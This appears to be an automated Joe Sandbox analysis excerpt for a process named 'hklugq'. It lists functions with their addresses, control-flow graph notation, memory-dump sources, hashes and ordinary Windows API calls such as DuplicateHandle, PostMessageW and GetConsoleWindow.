                                                            Function 07329923 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 135 7329923-73299c3 GetCurrentThreadId 139 73299c5-73299cb 135->139 140 73299cc-73299fb call 7328814 135->140 139->140 144 7329a00-7329a0d 140->144
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 073299B2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: e6c20e5f423add239c002deecc409a08228c7e8ce665ce1d6e6ce3e52e84e920
                                                            • Instruction ID: 01b8c432001b6c024901f5c3dd026b161224ba8e522ff60e9b3b8281aadd0525
                                                            • Opcode Fuzzy Hash: e6c20e5f423add239c002deecc409a08228c7e8ce665ce1d6e6ce3e52e84e920
                                                            • Instruction Fuzzy Hash: 053132B490035A8FDB01DFAAC884A9EBFF1FF48314F14855AD419AB312D734A945CFA1
                                                            Function 07329930 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 150 7329930-73299c3 GetCurrentThreadId 154 73299c5-73299cb 150->154 155 73299cc-73299fb call 7328814 150->155 154->155 159 7329a00-7329a0d 155->159
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 073299B2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: 2330bb6c3f14529557fb24f9b3210e312c97e0c793f8f3b9307cf3c7ae5369c1
                                                            • Instruction ID: 903157a36cdb805d970aa682896e8aefe7a67ccf8bce5124a940eba42c474899
                                                            • Opcode Fuzzy Hash: 2330bb6c3f14529557fb24f9b3210e312c97e0c793f8f3b9307cf3c7ae5369c1
                                                            • Instruction Fuzzy Hash: FC212FB490025A8FDB00DF9AC884A9EFFF5FB48314F108559D419AB311D734A945CFA1
                                                            Function 02CADAA8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 145 2cadaa8-2cadb44 DuplicateHandle 146 2cadb4d-2cadb6a 145->146 147 2cadb46-2cadb4c 145->147 147->146
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CADB37
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 1109de772517cdf908ab55cbfe0cc77c0472cb012d58c461bf70e7fdc0b746d5
                                                            • Instruction ID: b2cf538d82c8de423802f7607edca4c80700edebbf41c09d954d2bde0d1fffae
                                                            • Opcode Fuzzy Hash: 1109de772517cdf908ab55cbfe0cc77c0472cb012d58c461bf70e7fdc0b746d5
                                                            • Instruction Fuzzy Hash: 3821E4B5900249DFDB10CFAAD984BDEBBF5FB48314F14841AE919A7350D374A954CF60
                                                            Function 07328814 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 165 7328814-7329a62 167 7329a64-7329a6c 165->167 168 7329a6e-7329a9e EnumThreadWindows 165->168 167->168 169 7329aa0-7329aa6 168->169 170 7329aa7-7329ad4 168->170 169->170
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,05D6D49E,?,?,?,00000E20,?,?,07329A00,03CF414C,02D3E4A8), ref: 07329A91
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 976a2e849109c075bebd5a07cff5cd7d1e6fc16ebbf296e8c5292287b027128a
                                                            • Instruction ID: 15d9635224d6f170f8855eb64128fb267ad721fbf3d43784fc9b1f940e6d578d
                                                            • Opcode Fuzzy Hash: 976a2e849109c075bebd5a07cff5cd7d1e6fc16ebbf296e8c5292287b027128a
                                                            • Instruction Fuzzy Hash: 462149B1D0021A9FEB10CF9AC844BEEFBF9FB88310F10842AD459A7250D774A945CFA4
                                                            Function 02CADAB0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 160 2cadab0-2cadb44 DuplicateHandle 161 2cadb4d-2cadb6a 160->161 162 2cadb46-2cadb4c 160->162 162->161
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CADB37
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 89cb7c41db64928c9955c649b9864e9c7d24314da48e9d9abf68402f08142401
                                                            • Instruction ID: 67df284f116b6980a6c62c3f549fc83b96034460ea11ad6dfdb672e19bb07bb9
                                                            • Opcode Fuzzy Hash: 89cb7c41db64928c9955c649b9864e9c7d24314da48e9d9abf68402f08142401
                                                            • Instruction Fuzzy Hash: 6321E4B59002499FDB10CFAAD884ADEFBF8FB48314F14841AE915A3350D374A954CFA0
                                                            Function 07329A1B Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 174 7329a1b-7329a62 176 7329a64-7329a6c 174->176 177 7329a6e-7329a9e EnumThreadWindows 174->177 176->177 178 7329aa0-7329aa6 177->178 179 7329aa7-7329ad4 177->179 178->179
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,05D6D49E,?,?,?,00000E20,?,?,07329A00,03CF414C,02D3E4A8), ref: 07329A91
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: a5e1586539e96a7225a7da34dc30833494ddd07acb385c61900a42de819cecfb
                                                            • Instruction ID: 352c5f654e5e57e5c1e3b0b5a11682c1334c0ac342ed7def9a898a268c421257
                                                            • Opcode Fuzzy Hash: a5e1586539e96a7225a7da34dc30833494ddd07acb385c61900a42de819cecfb
                                                            • Instruction Fuzzy Hash: CF211AB19002198FEB14DF9AC844BEEFBF5FB88310F14842AD454A7250D774A945CF65
                                                            Function 07326680 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 183 7326680-73266fd PeekMessageW 184 7326706-7326727 183->184 185 73266ff-7326705 183->185 185->184
                                                            APIs
                                                            • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,073262A2,00000000,00000000,03CF414C,02D3E4A8), ref: 073266F0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: MessagePeek
                                                            • String ID:
                                                            • API String ID: 2222842502-0
                                                            • Opcode ID: 845b875905569651b805afec883e29b25d3e7b9bd2cca68f459bee2840e6b647
                                                            • Instruction ID: 7f8656d3641a47de05035c93ed0287c83dd13fb793a70c9a3137e8143ff6ebb0
                                                            • Opcode Fuzzy Hash: 845b875905569651b805afec883e29b25d3e7b9bd2cca68f459bee2840e6b647
                                                            • Instruction Fuzzy Hash: 821147B5C00259DFDB10CF9AD985BEEBBF8FB08320F10841AE558A3650C378A544CFA1
                                                            Function 073242E8 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 187 73242e8-73266fd PeekMessageW 189 7326706-7326727 187->189 190 73266ff-7326705 187->190 190->189
                                                            APIs
                                                            • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,073262A2,00000000,00000000,03CF414C,02D3E4A8), ref: 073266F0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: MessagePeek
                                                            • String ID:
                                                            • API String ID: 2222842502-0
                                                            • Opcode ID: 529e4179d6d800e9b7a4716089a7d90f49dc3eb4aaf533de702ca6028abb6f14
                                                            • Instruction ID: c56183454cb7075f15848ea12481e56e1c46f61d7cbebc99c47e3ab894a7fdbc
                                                            • Opcode Fuzzy Hash: 529e4179d6d800e9b7a4716089a7d90f49dc3eb4aaf533de702ca6028abb6f14
                                                            • Instruction Fuzzy Hash: 7F1129B5800359DFDB10DF9AD885BDEBBF8FB48320F10842AE519A3640C378A945CFA5
                                                            Function 073276D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 198 73276d8-732a4ba PostMessageW 200 732a4c3-732a4d7 198->200 201 732a4bc-732a4c2 198->201 201->200
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0732A4AD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 57006a51b9a1537fe9519eb691adb7f2f82dfe80fa4e8a5c899dc7a47c27c79d
                                                            • Instruction ID: 1afc7f88cdb3f790f7e21a0c84d264ee672b907f614674de45bc1aa3e92f3718
                                                            • Opcode Fuzzy Hash: 57006a51b9a1537fe9519eb691adb7f2f82dfe80fa4e8a5c899dc7a47c27c79d
                                                            • Instruction Fuzzy Hash: 3111F5B58003599FDB10DF9AC889BDEBBF8FB48324F10841AE919A7310D375A944CFA5
                                                            Function 0732A448 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0732A4AD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1650981885.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7320000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 34a4172f88b3e4071ec6d46c4802c8707142e007f97ab480ff447aaa2a1eac94
                                                            • Instruction ID: 70595e0d841225958e4cd4f5fa807c14b2f4363981c03639bccd60b94a1999b3
                                                            • Opcode Fuzzy Hash: 34a4172f88b3e4071ec6d46c4802c8707142e007f97ab480ff447aaa2a1eac94
                                                            • Instruction Fuzzy Hash: FE11E3B6800219DFDB10DF99D549BDEBBF4FB48320F10841AD519A7600D375A545CFA1
                                                            Function 02CAB3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 192 2cab3b8-2cab3f8 193 2cab3fa-2cab3fd 192->193 194 2cab400-2cab42b GetModuleHandleW 192->194 193->194 195 2cab42d-2cab433 194->195 196 2cab434-2cab448 194->196 195->196
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02CAB41E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648774240.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2ca0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 7b9fd5c480288727876ff7e8be37435c8d84c91e0bce7ca93a030a54270e0b86
                                                            • Instruction ID: 3996fd951fc48a705919c16aee12903fa433dd7913285fcbf2b8a8ac68ecdb8c
                                                            • Opcode Fuzzy Hash: 7b9fd5c480288727876ff7e8be37435c8d84c91e0bce7ca93a030a54270e0b86
                                                            • Instruction Fuzzy Hash: 0C1110B5C0074A8FDB20CF9AC844BDEFBF4AF88228F10841AD419A7200D379A945CFA1
                                                            Function 012ED3D8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648440645.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_12ed000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1dc28684a3445ba66f7303374cfde77dacb9990bcd9916fbdd3b7cef07cb5595
                                                            • Instruction ID: 7c43eb2cc4d0b96bac9a7446591086f6ab5690bba27b6af9a136305a9163152e
                                                            • Opcode Fuzzy Hash: 1dc28684a3445ba66f7303374cfde77dacb9990bcd9916fbdd3b7cef07cb5595
                                                            • Instruction Fuzzy Hash: 5E2145B5214309DFDB01DF84D9C8B56BFA5FBA8324F60C16DE9090B246C376E446CBA2
                                                            Function 012FD01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648488889.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_12fd000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a86fe9b36ab708900268cb14d261d30213c67da1dafdec082292354f5bffd458
                                                            • Instruction ID: e47ec3f486c7323850e03d471f2bd18509f5f87fa0b33f83b6f1bbb56351a416
                                                            • Opcode Fuzzy Hash: a86fe9b36ab708900268cb14d261d30213c67da1dafdec082292354f5bffd458
                                                            • Instruction Fuzzy Hash: FF210075614308DFDB15DF64D984B16FB61FB84314F20C57DEA0A4B286C37AD407CA62
                                                            Function 012FD2BC Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648488889.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_12fd000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97c6364d27ddfb890e53d66cc9717722e253a14444118f1f472b4a3c4e9258ec
                                                            • Instruction ID: 84fb7ed5de3110d8ceea6292a8c7581c9608a71ce4983d0824a118522b0fb462
                                                            • Opcode Fuzzy Hash: 97c6364d27ddfb890e53d66cc9717722e253a14444118f1f472b4a3c4e9258ec
                                                            • Instruction Fuzzy Hash: E72101B66143099FDB01DF54D984B2AFB65FB84624F24C57DDB490B242C37AE406CFA2
                                                            Function 012FD006 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648488889.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_12fd000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 456a1cb15db28149e3db8f4fa5fcafd3ab928dc55347fb22275b9a0417020bdf
                                                            • Instruction ID: 01191e31e712fc6dc4757a58c192462a5d3aa49b4ebaf2a61ff31589779d0376
                                                            • Opcode Fuzzy Hash: 456a1cb15db28149e3db8f4fa5fcafd3ab928dc55347fb22275b9a0417020bdf
                                                            • Instruction Fuzzy Hash: B02179755093848FCB02CF24D990B15BF71EB46314F28C5EED9498B2A7C33A980ACB62
                                                            Function 012ED3D3 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648440645.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_12ed000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction ID: 62914b7aeb440df6e4b936d722720b56576025421c26cb5043e5ee86c7c9b3cf
                                                            • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction Fuzzy Hash: 3E110376504285CFCB02CF44D5C4B56BFB2FB94324F24C2A9D9090B257C33AE456CBA1
                                                            Function 012FD2B7 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1648488889.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_12fd000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 862c65023cd92449f428095a58a3181619df817727a273a2fecd008dac0e22f8
                                                            • Instruction ID: 6026fb78c368aab0385c0da4ffb2df926b2e9195612c21f2b8ece7dbd2094b02
                                                            • Opcode Fuzzy Hash: 862c65023cd92449f428095a58a3181619df817727a273a2fecd008dac0e22f8
                                                            • Instruction Fuzzy Hash: E3119D7A504284CFDB12CF14D5C4B19FB61FB84224F28C6AEDA494B656C33AD40ACFA2

                                                            Execution Graph

                                                            Execution Coverage:7.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:5
                                                            Total number of Limit Nodes:0
                                                            execution_graph 8951 12d6480 8954 12d5a54 8951->8954 8953 12d649d 8955 12d6780 GetConsoleWindow 8954->8955 8957 12d67eb 8955->8957 8957->8953

                                                            Executed Functions

                                                            Function 012D6778 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6 12d6778-12d67b7 8 12d67bf-12d67e9 GetConsoleWindow 6->8 9 12d67eb-12d67f1 8->9 10 12d67f2-12d6806 8->10 9->10
                                                            APIs
                                                            • GetConsoleWindow.KERNELBASE ref: 012D67DC
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3883427511.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_12d0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWindow
                                                            • String ID:
                                                            • API String ID: 2863861424-0
                                                            • Opcode ID: 0457122ea966ade4380220b9fa9ed3cd41d4eb556d297d30650ad39e026f0704
                                                            • Instruction ID: ea351cac05c8dc23a35bb0871689b523bfee6fec79a4bb443a34ec651d05999c
                                                            • Opcode Fuzzy Hash: 0457122ea966ade4380220b9fa9ed3cd41d4eb556d297d30650ad39e026f0704
                                                            • Instruction Fuzzy Hash: 7E1123B58003498FDB20DF9AC885BDEBBF4EB48324F208419D559A3390C778A944CFA1
                                                            Function 012D5A54 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 12d5a54-12d67e9 GetConsoleWindow 3 12d67eb-12d67f1 0->3 4 12d67f2-12d6806 0->4 3->4
                                                            APIs
                                                            • GetConsoleWindow.KERNELBASE ref: 012D67DC
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3883427511.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_12d0000_hklugq.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWindow
                                                            • String ID:
                                                            • API String ID: 2863861424-0
                                                            • Opcode ID: 91e19ee593233cbb02096518fda806e67653d4494ab55fac1c08cd72e43f21e9
                                                            • Instruction ID: aaf8b7c98260c45da9050ee8a6d991a4875c59633d4e8e968031e76ac6cc6a47
                                                            • Opcode Fuzzy Hash: 91e19ee593233cbb02096518fda806e67653d4494ab55fac1c08cd72e43f21e9
                                                            • Instruction Fuzzy Hash: 5D1100B48007498FDB20DF9AC484BAEBBF4EB48320F208419D559A7390D778A944CFA5
                                                            Function 0103D4D8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3882739710.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_103d000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d342972e562223f759eb902b3b46d21d5fc05e8a12b20a892309f2e1f2d6239b
                                                            • Instruction ID: 121de5f76a97126a4a655651e138f50f9fc88f4ff1b17a4364f4a556c3354120
                                                            • Opcode Fuzzy Hash: d342972e562223f759eb902b3b46d21d5fc05e8a12b20a892309f2e1f2d6239b
                                                            • Instruction Fuzzy Hash: 18212871604304DFDB05DF54D9C4B16BFA9FBC8328F6085ADD9490B296C336D456CBA2
                                                            Function 0104D1CC Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3882793186.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_104d000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d25db04dc795ff6678c6bd489cc6314b8bcdbc57f16008455562e6327fc9d4a3
                                                            • Instruction ID: 1d7b77c0801f07ddc4b50dcd0a4a81333c6c5e127114f1258749202ab6013376
                                                            • Opcode Fuzzy Hash: d25db04dc795ff6678c6bd489cc6314b8bcdbc57f16008455562e6327fc9d4a3
                                                            • Instruction Fuzzy Hash: 972125F5604304AFDB01DF94D6C4B16BBA1FBA4724F20C5BDD8894B256C336D406CB61
                                                            Function 0104D01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3882793186.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_104d000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64e1b8502075955fe07ddad0637b3e8f6f0608a76d74773a867dcfb248c0981e
                                                            • Instruction ID: a38fda2e0b767d55f82c09c64d8be4974b2f56399dc3f1341d3bc82218a927c0
                                                            • Opcode Fuzzy Hash: 64e1b8502075955fe07ddad0637b3e8f6f0608a76d74773a867dcfb248c0981e
                                                            • Instruction Fuzzy Hash: 642131B12043009FDB11DF54D8C4B2ABBA5FB94724F20C6B9E9890B242C37AD447CBA2
                                                            Function 0104D006 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3882793186.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_104d000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 90946b9d4cbcd798d63018bac87ef4b24e54012b97268765520f06bad592561a
                                                            • Instruction ID: 830e102e9d90f29f5c158197f13ff45d87123709f0b81156f54d7b849f6025aa
                                                            • Opcode Fuzzy Hash: 90946b9d4cbcd798d63018bac87ef4b24e54012b97268765520f06bad592561a
                                                            • Instruction Fuzzy Hash: 3521C6B55083809FCB13CF14D9D4715BFB1FB96224F29C5EAD8854B293C33A9806CB62
                                                            Function 0103D4D3 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3882739710.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_103d000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction ID: 49c7c302dd2d6896b44ab9babedc80c0e735d0e1ce701668e36255335813ee50
                                                            • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction Fuzzy Hash: 3911D376504240CFCB16CF54D5C4B16BFB2FB84324F24C6A9D9490B297C33AD456CBA1
                                                            Function 0104D1C7 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.3882793186.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_104d000_hklugq.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                            • Instruction ID: a925588c5600fa13cb3984b199bdda32126e18bbe69e49eaadc5505c3bbf4bbb
                                                            • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                            • Instruction Fuzzy Hash: CA11DDB9504284DFDB02CF54D6C4B15BFA2FB94324F24C6ADD8894B297C33AD40ACB61